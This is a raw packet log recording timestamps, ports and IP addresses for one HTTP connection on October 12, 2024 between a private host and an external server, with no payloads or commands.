Oct 12, 2024 16:39:57.348795891 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.348884106 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.348884106 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.348884106 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.348896027 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.348999977 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.349024057 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.349039078 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.349050999 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.349050999 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.349054098 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.349071026 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.349073887 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.349092960 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.349113941 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.349178076 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.349193096 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.349208117 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.349222898 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.349225998 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.349235058 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.349239111 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.349250078 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.349262953 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.349263906 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.349281073 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.349284887 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.349296093 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.349298954 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.349313021 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.349323034 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.349328041 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.349343061 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.349344969 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.349359989 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.349366903 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.349375963 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.349385977 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.349390984 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.349392891 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.349409103 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.349416971 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.349416971 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.349431038 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.349435091 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.349450111 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.349456072 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.349473953 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.349481106 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.349489927 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.349492073 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.349504948 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.349515915 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.349520922 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.349536896 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.349536896 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.349554062 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.349555969 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.349561930 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.349571943 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.349581957 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.349589109 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.349602938 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.349603891 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.349610090 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.349627018 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.349632025 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.349641085 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.349643946 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.349663019 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.349673033 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.349684000 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.349685907 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.349701881 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.349703074 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.349718094 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.349726915 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.349739075 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.349745035 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.349755049 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.349765062 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.349771023 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.349780083 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.349786997 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.349800110 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.349802971 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.349822044 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.349844933 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.349864006 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.349905014 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.349920034 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.349934101 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.349948883 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.349962950 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.349966049 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.349975109 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.349986076 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.349987984 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.350003004 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.350008011 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.350018024 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.350025892 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.350032091 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.350037098 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.350052118 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.350059032 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.350068092 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.350080013 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.350091934 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.350095034 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.350109100 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.350123882 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.350136042 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.350156069 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.350156069 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.350164890 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.350197077 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.350203037 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.350219965 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.350224018 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.350235939 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.350239038 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.350250006 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.350250959 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.350277901 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.350291014 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.350433111 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.350455046 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.350472927 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.350485086 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.350486040 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.350496054 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.350502968 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.350517988 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.350518942 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.350526094 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.350534916 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.350544930 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.350550890 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.350563049 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.350567102 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.350577116 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.350584030 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.350590944 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.350600958 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.350610971 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.350616932 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.350619078 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.350636959 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.350639105 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.350652933 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.350655079 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.350672960 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.350682020 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.350687981 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.350702047 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.350722075 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.350739002 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.350756884 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.350756884 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.350786924 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.350882053 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.350903988 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.350920916 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.350934029 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.350934982 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.350944042 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.350950956 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.350953102 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.350970030 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.350976944 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.350986004 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.350991011 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.351001024 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.351013899 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.351018906 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.351028919 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.351033926 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.351048946 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.351049900 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.351056099 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.351066113 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.351075888 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.351083040 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.351089001 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.351098061 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.351109982 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.351123095 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.351134062 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.351186037 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.405961990 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.405987024 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.406002998 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.406017065 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.406032085 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.406047106 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.406064987 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.406076908 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.406167030 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.406167030 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.406167030 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.406167030 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.438918114 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.438932896 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.438947916 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.438962936 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.438976049 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.438988924 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.439003944 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.439003944 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.439017057 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.439027071 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.439038038 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.439049006 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.439057112 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.439071894 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.439086914 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.439099073 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.439101934 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.439117908 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.439119101 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.439129114 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.439136028 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.439146042 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.439152956 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.439156055 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.439168930 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.439187050 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.439194918 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.439198017 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.439213037 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.439218998 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.439227104 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.439229012 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.439245939 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.439259052 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.439260006 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.439270973 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.439275980 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.439289093 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.439291954 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.439313889 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.439317942 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.439321995 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.439333916 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.439357042 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.439362049 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.439373016 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.439377069 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.439399004 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.439404011 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.439423084 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.439440966 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.439455986 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.439456940 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.439456940 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.439466953 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.439475060 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.439488888 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.439490080 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.439501047 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.439506054 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.439521074 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.439527035 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.439541101 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.439557076 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.439557076 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.439563036 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.439570904 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.439578056 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.439580917 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.439585924 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.439609051 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.439625025 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.439635992 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.439642906 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.439661026 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.439661026 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.439667940 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.439672947 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.439682961 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.439685106 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.439694881 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.439699888 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.439703941 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.439723015 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.439727068 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.439727068 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.439733982 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.439740896 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.439755917 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.439764023 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.439771891 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.439783096 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.439785957 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.439798117 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.439801931 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.439805031 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.439820051 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.439824104 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.439836025 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.439846992 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.439851046 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.439862013 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.439867020 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.439876080 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.439882040 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.439893007 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.439898014 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.439913034 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.439913988 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.439913988 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.439929962 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.439939976 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.439946890 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.439951897 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.439964056 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.439976931 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.439979076 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.439985991 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.439995050 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.440001011 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.440011024 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.440021038 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.440035105 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.440035105 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.440051079 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.440052986 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.440068007 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.440079927 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.440099955 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.440110922 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.440110922 CEST	49170	80	192.168.2.22	104.168.7.25
